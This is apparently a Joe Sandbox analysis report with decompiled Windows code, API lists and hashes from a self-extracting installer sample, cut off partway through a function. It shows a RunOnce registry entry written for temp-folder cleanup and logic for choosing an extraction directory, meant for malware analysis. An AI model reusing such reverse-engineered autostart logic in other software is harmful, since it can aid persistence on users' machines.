                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                      • Opcode ID: 5e323bea84e603799dc9bc876d52c44c9bfe87dcb5b19dd203d2e66b4e2ebe76
                                                                                                                                                                                                      • Instruction ID: 63a628905575f06024a1f5bda5c9cfc2033a2d41518d288d2d1e3759d567c3b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e323bea84e603799dc9bc876d52c44c9bfe87dcb5b19dd203d2e66b4e2ebe76
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2631C4723047C09FD320EBA5CC89EEB73ECAFC9701F04492DB555AA191EB38A909C752
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                                                      			E000E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                      							 *0xea288(0, 1, 0, 0);
                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                      				 *0xe9124 = 0;
                                                                                                                                                                                                      				if(E000E2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                      					_t9 = E000E2F1D(_t18, _t20); // executed
                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                      					E000E52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                      						_t32 =  *0xe8a3a; // 0x0
                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                      							_t19 =  *0xe9a2c; // 0x0
                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                      								E000E1F90(_t19, _t21, _t22);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t6 =  *0xe8588; // 0x0
                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 =  *0xe9124; // 0x80070002
                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x000e2c03
                                                                                                                                                                                                      0x000e2c0d
                                                                                                                                                                                                      0x000e2c18
                                                                                                                                                                                                      0x000e2c20
                                                                                                                                                                                                      0x000e2c2e
                                                                                                                                                                                                      0x000e2c32
                                                                                                                                                                                                      0x000e2c36
                                                                                                                                                                                                      0x000e2c3d
                                                                                                                                                                                                      0x000e2c43
                                                                                                                                                                                                      0x000e2c45
                                                                                                                                                                                                      0x000e2c47
                                                                                                                                                                                                      0x000e2c49
                                                                                                                                                                                                      0x000e2c4e
                                                                                                                                                                                                      0x000e2c4e
                                                                                                                                                                                                      0x000e2c47
                                                                                                                                                                                                      0x000e2c32
                                                                                                                                                                                                      0x000e2c20
                                                                                                                                                                                                      0x000e2c50
                                                                                                                                                                                                      0x000e2c54
                                                                                                                                                                                                      0x000e2c57
                                                                                                                                                                                                      0x000e2c64
                                                                                                                                                                                                      0x000e2c66
                                                                                                                                                                                                      0x000e2c6b
                                                                                                                                                                                                      0x000e2c6d
                                                                                                                                                                                                      0x000e2c74
                                                                                                                                                                                                      0x000e2c76
                                                                                                                                                                                                      0x000e2c7c
                                                                                                                                                                                                      0x000e2c7e
                                                                                                                                                                                                      0x000e2c87
                                                                                                                                                                                                      0x000e2c89
                                                                                                                                                                                                      0x000e2c89
                                                                                                                                                                                                      0x000e2c87
                                                                                                                                                                                                      0x000e2c7c
                                                                                                                                                                                                      0x000e2c74
                                                                                                                                                                                                      0x000e2c8e
                                                                                                                                                                                                      0x000e2c95
                                                                                                                                                                                                      0x000e2c98
                                                                                                                                                                                                      0x000e2c98
                                                                                                                                                                                                      0x000e2c9e
                                                                                                                                                                                                      0x000e2ca7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,000E6BB0,000E0000,00000000,00000002,0000000A), ref: 000E2C03
                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,000E6BB0,000E0000,00000000,00000002,0000000A), ref: 000E2C18
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 000E2C28
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,000E6BB0,000E0000,00000000,00000002,0000000A), ref: 000E2C98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                      • Opcode ID: ad90d3f53b8fcad4ca02039a90a3ef6dc26aa8c1754c2be441ea148811d9eaa8
                                                                                                                                                                                                      • Instruction ID: 63ce3c8f92ec5c06e53b66e176c200377aea61bcbad14f15b2f00eb8544a9b24
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad90d3f53b8fcad4ca02039a90a3ef6dc26aa8c1754c2be441ea148811d9eaa8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 371129313003C59FE7246BB7ECC8AAF379D9B88B80B140029F904FB251CA38FC418661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E6F40() {
                                                                                                                                                                                                      
                                                                                                                                                                                                      				SetUnhandledExceptionFilter(E000E6EF0); // executed
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}



                                                                                                                                                                                                      0x000e6f45
                                                                                                                                                                                                      0x000e6f4d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 000E6F45
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                      • Opcode ID: 7bda914cf197cde556fb568b54ec8e37d290d4c93f90d38de3e6fed76a8ce21a
                                                                                                                                                                                                      • Instruction ID: 7e79da3f08ac77b20c67d38b96f9a14ef1d912632a58cad98e7d42d0c8eea4d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bda914cf197cde556fb568b54ec8e37d290d4c93f90d38de3e6fed76a8ce21a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 539002643511804BA6101B71AD5942579915B5FA42B8154A1B111EC5D4DB6550405512
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				void* _v532;
                                                                                                                                                                                                      				int _v536;
                                                                                                                                                                                                      				int _v540;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				struct HINSTANCE__* _t46;
                                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				void _t56;
                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				intOrPtr* _t81;
                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t79 = __edx;
                                                                                                                                                                                                      				_t28 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                      				_t84 = 0x104;
                                                                                                                                                                                                      				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                      				_t95 = _t94 + 0x18;
                                                                                                                                                                                                      				_t66 = 0;
                                                                                                                                                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					L24:
                                                                                                                                                                                                      					return E000E6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(_t86);
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E000E171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                      					_t95 = _t95 + 0x10;
                                                                                                                                                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                      					if(_t41 != 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t87 = _t87 + 1;
                                                                                                                                                                                                      					if(_t87 < 0xc8) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t87 != 0xc8) {
                                                                                                                                                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                      					_t79 = _t84;
                                                                                                                                                                                                      					E000E658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                      					_t84 = _t46;
                                                                                                                                                                                                      					if(_t84 == 0) {
                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                      						if(GetModuleFileNameA( *0xe9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      							L17:
                                                                                                                                                                                                      							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							_pop(_t86);
                                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						_t72 =  &_v268;
                                                                                                                                                                                                      						_t80 = _t72 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t49 =  *_t72;
                                                                                                                                                                                                      							_t72 = _t72 + 1;
                                                                                                                                                                                                      						} while (_t49 != 0);
                                                                                                                                                                                                      						_t73 = _t72 - _t80;
                                                                                                                                                                                                      						_t81 = 0xe91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t50 =  *_t81;
                                                                                                                                                                                                      							_t81 = _t81 + 1;
                                                                                                                                                                                                      						} while (_t50 != 0);
                                                                                                                                                                                                      						_t84 = _t73 + 0x50 + _t81 - 0xe91e5;
                                                                                                                                                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xe91e5);
                                                                                                                                                                                                      						if(_t90 != 0) {
                                                                                                                                                                                                      							 *0xe8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								_t54 = "%s /D:%s";
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      							E000E171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                      							_t75 = _t90;
                                                                                                                                                                                                      							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                      							_t79 = _t23;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t56 =  *_t75;
                                                                                                                                                                                                      								_t75 = _t75 + 1;
                                                                                                                                                                                                      							} while (_t56 != 0);
                                                                                                                                                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                      							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                      							RegCloseKey(_v532); // executed
                                                                                                                                                                                                      							_t36 = LocalFree(_t90);
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t79 = 0x4b5;
                                                                                                                                                                                                      						E000E44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                      					FreeLibrary(_t84); // executed
                                                                                                                                                                                                      					if(_t91 == 0) {
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      						E000E658A( &_v268, 0x104, 0xe1140);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                      				 *0xe8530 = _t66;
                                                                                                                                                                                                      				goto L23;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x000e202a
                                                                                                                                                                                                      0x000e2035
                                                                                                                                                                                                      0x000e203c
                                                                                                                                                                                                      0x000e2041
                                                                                                                                                                                                      0x000e2050
                                                                                                                                                                                                      0x000e205f
                                                                                                                                                                                                      0x000e2064
                                                                                                                                                                                                      0x000e206f
                                                                                                                                                                                                      0x000e208c
                                                                                                                                                                                                      0x000e2094
                                                                                                                                                                                                      0x000e2257
                                                                                                                                                                                                      0x000e2266
                                                                                                                                                                                                      0x000e2266
                                                                                                                                                                                                      0x000e209a
                                                                                                                                                                                                      0x000e209b
                                                                                                                                                                                                      0x000e209d
                                                                                                                                                                                                      0x000e20aa
                                                                                                                                                                                                      0x000e20af
                                                                                                                                                                                                      0x000e20c9
                                                                                                                                                                                                      0x000e20d1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e20d3
                                                                                                                                                                                                      0x000e20da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e20da
                                                                                                                                                                                                      0x000e20e2
                                                                                                                                                                                                      0x000e2103
                                                                                                                                                                                                      0x000e210e
                                                                                                                                                                                                      0x000e2116
                                                                                                                                                                                                      0x000e2122
                                                                                                                                                                                                      0x000e2128
                                                                                                                                                                                                      0x000e212c
                                                                                                                                                                                                      0x000e2179
                                                                                                                                                                                                      0x000e2194
                                                                                                                                                                                                      0x000e21de
                                                                                                                                                                                                      0x000e21e4
                                                                                                                                                                                                      0x000e2256
                                                                                                                                                                                                      0x000e2256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2256
                                                                                                                                                                                                      0x000e2196
                                                                                                                                                                                                      0x000e2196
                                                                                                                                                                                                      0x000e219c
                                                                                                                                                                                                      0x000e219f
                                                                                                                                                                                                      0x000e219f
                                                                                                                                                                                                      0x000e21a1
                                                                                                                                                                                                      0x000e21a2
                                                                                                                                                                                                      0x000e21a6
                                                                                                                                                                                                      0x000e21a8
                                                                                                                                                                                                      0x000e21b0
                                                                                                                                                                                                      0x000e21b0
                                                                                                                                                                                                      0x000e21b2
                                                                                                                                                                                                      0x000e21b3
                                                                                                                                                                                                      0x000e21bc
                                                                                                                                                                                                      0x000e21c7
                                                                                                                                                                                                      0x000e21cb
                                                                                                                                                                                                      0x000e21f1
                                                                                                                                                                                                      0x000e21f6
                                                                                                                                                                                                      0x000e21fd
                                                                                                                                                                                                      0x000e21ff
                                                                                                                                                                                                      0x000e21ff
                                                                                                                                                                                                      0x000e2204
                                                                                                                                                                                                      0x000e2213
                                                                                                                                                                                                      0x000e2218
                                                                                                                                                                                                      0x000e221d
                                                                                                                                                                                                      0x000e221d
                                                                                                                                                                                                      0x000e2220
                                                                                                                                                                                                      0x000e2220
                                                                                                                                                                                                      0x000e2222
                                                                                                                                                                                                      0x000e2223
                                                                                                                                                                                                      0x000e2229
                                                                                                                                                                                                      0x000e223d
                                                                                                                                                                                                      0x000e2249
                                                                                                                                                                                                      0x000e2250
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2250
                                                                                                                                                                                                      0x000e21d2
                                                                                                                                                                                                      0x000e21d9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e21d9
                                                                                                                                                                                                      0x000e213a
                                                                                                                                                                                                      0x000e2141
                                                                                                                                                                                                      0x000e2144
                                                                                                                                                                                                      0x000e214c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2163
                                                                                                                                                                                                      0x000e2172
                                                                                                                                                                                                      0x000e2172
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2163
                                                                                                                                                                                                      0x000e20ea
                                                                                                                                                                                                      0x000e20f0
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E2050
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E205F
                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 000E208C
                                                                                                                                                                                                        • Part of subcall function 000E171E: _vsnprintf.MSVCRT ref: 000E1750
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E20C9
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E20EA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E2103
                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E2122
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 000E2134
                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E2144
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 000E215B
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E218C
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E21C1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E21E4
                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 000E223D
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E2249
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000E2250
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                      • API String ID: 178549006-455997452
                                                                                                                                                                                                      • Opcode ID: dd90f71f8d250ebdf23fd860340b951453f290107f4b61ba449ed3875bdc934d
                                                                                                                                                                                                      • Instruction ID: ee9796a254b9d82d28c92a5d65aa7c86f04d3e1b4121b6d09e0edf91bb60822d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd90f71f8d250ebdf23fd860340b951453f290107f4b61ba449ed3875bdc934d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF513972A00294AFEB209B22DC89FFB777CEB55B40F0041E8FA09FB151DA759E448B50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 232 e55a0-e55d9 call e468f LocalAlloc 235 e55fd-e560c call e468f 232->235 236 e55db-e55f1 call e44b9 call e6285 232->236 241 e560e-e5630 call e44b9 LocalFree 235->241 242 e5632-e5643 lstrcmpA 235->242 248 e55f6-e55f8 236->248 241->248 245 e564b-e5659 LocalFree 242->245 246 e5645 242->246 250 e565b-e565d 245->250 251 e5696-e569c 245->251 246->245 252 e58b7-e58c7 call e6ce0 248->252 255 e565f-e5667 250->255 256 e5669 250->256 253 e589f-e58b5 call e6517 251->253 254 e56a2-e56a8 251->254 253->252 254->253 259 e56ae-e56c1 GetTempPathA 254->259 255->256 260 e566b-e567a call e5467 255->260 256->260 263 e56f3-e5711 call e1781 259->263 264 e56c3-e56c9 call e5467 259->264 269 e589b-e589d 260->269 270 e5680-e5691 call e44b9 260->270 274 e586c-e5890 GetWindowsDirectoryA call e597d 263->274 275 e5717-e5729 GetDriveTypeA 263->275 272 e56ce-e56d0 264->272 269->252 270->248 272->269 276 e56d6-e56df call e2630 272->276 274->263 288 e5896 274->288 278 e572b-e572e 275->278 279 e5730-e5740 GetFileAttributesA 275->279 276->263 289 e56e1-e56ed call e5467 276->289 278->279 282 e5742-e5745 278->282 279->282 283 e577e-e578f call e597d 279->283 286 e576b 282->286 287 e5747-e574f 282->287 295 e57b2-e57bf call e2630 283->295 296 e5791-e579e call e2630 283->296 292 e5771-e5779 286->292 287->292 293 e5751-e5753 287->293 288->269 289->263 289->269 298 e5864-e5866 292->298 293->292 297 e5755-e5762 call e6952 293->297 307 e57d3-e57f8 call e658a GetFileAttributesA 295->307 308 e57c1-e57cd GetWindowsDirectoryA 295->308 296->286 306 e57a0-e57b0 call e597d 296->306 297->286 309 e5764-e5769 297->309 298->274 298->275 306->286 306->295 314 e580a 307->314 315 e57fa-e5808 CreateDirectoryA 307->315 308->307 309->283 309->286 316 e580d-e580f 314->316 315->316 317 e5827-e585c SetFileAttributesA call e1781 call e5467 316->317 318 e5811-e5825 316->318 317->269 323 e585e 317->323 318->298 323->298
                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E000E55A0(void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v265;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                      				int _t35;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                                      				long _t48;
                                                                                                                                                                                                      				int _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				int _t54;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				char _t60;
                                                                                                                                                                                                      				int _t65;
                                                                                                                                                                                                      				char _t66;
                                                                                                                                                                                                      				int _t67;
                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                      				int _t69;
